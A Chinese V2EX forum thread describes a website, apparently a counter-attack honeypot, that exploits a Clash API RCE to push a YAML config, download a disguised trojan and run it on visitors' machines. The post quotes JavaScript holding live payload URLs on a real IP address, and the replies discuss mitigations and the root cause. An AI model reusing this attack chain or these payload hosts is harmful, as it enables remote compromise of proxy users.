把 Clash RCE 武器化的典型案例

46 天前
 huangxiao123

国护已经完成,期间朋友分享了个很骚的网站,该站的蓝队人员把 Clash RCE 运用到了实战里

RT ,访问该网站,会自动枚举 Clash 常见端口 + 4170x 端口,然后调用 Clash API 下发 yaml

Link

JavaScript

还做了系统版本判断,Victim 有 Win 有 Mac

Yaml 文件

let yaml_path = {
    "win": "http://60.29.77.223:8080/05260CAD5B9562AEA0AAC8039A3AD3987E8E5E42330C39421B5F2D8D9B7880A806755F53968F788FF311B9A772",
    "mac": "http://60.29.77.223:8080/385A4D8141A3E7951E5DCFF35A11387BA4B79B23970EF6954CD8F5CFF75B5E463662978C95EF1B2D2868232F60",
}

这里以 windows 为例子,会执行 Powershell Invoke-RestMehod 方法下载 exe 存到C:\Users\Public\winIogon.exe 并且执行 winIogon.exe

木马分析

微步

做了基础的一些沙箱检测,木马行为就单纯的执行 shellcode ,非注入

更深入的分析 IDA 什么的,楼主就不会了 TAT

5256 次点击
所在节点    信息安全
28 条回复
metalvest
45 天前
@metalvest 看漏了,op 说了 victim 有 mac
sky96111
45 天前
@NotLongNil 是的。如果是 clash verge rev ,用新的 unix domain socket 方案也是安全的
chitaotao
45 天前
ublock origin 有一个 Block Outsider Intrusion into LAN 规则,可以屏蔽对本地网络的访问; jshelter 也有屏蔽本地网络访问的选项
lymanbernadette6
45 天前
emmm controller 有密码基本就没事 建议还是去掉超链接或者标记危险。。
NGGTI
45 天前
@whoami9894 老操作了,几年前就那 sxf vpn 的洞来做反制。
150530
45 天前
不会跨域吗?
kuanat
45 天前
@codehz #8 感谢解释。

我这边检查了一下,是我之前拦截了对 localhost 的访问,我还以为之前的 PNA 通过了呢。

我又回头确认了一遍,RCE 是两部分共同实现的,通过 api 控制是 POST/json ,本身是需要跨域的,但 clash 默认允许……第二个漏洞是配置项在 unmarshalling 的时候,解析的路径没有检查就直接使用,所以可以下载任意文件并执行。
gksec
35 天前
几年前的东西了,国内头部蜜罐厂商的东西

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://ex.noerr.eu.org/t/1151415

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX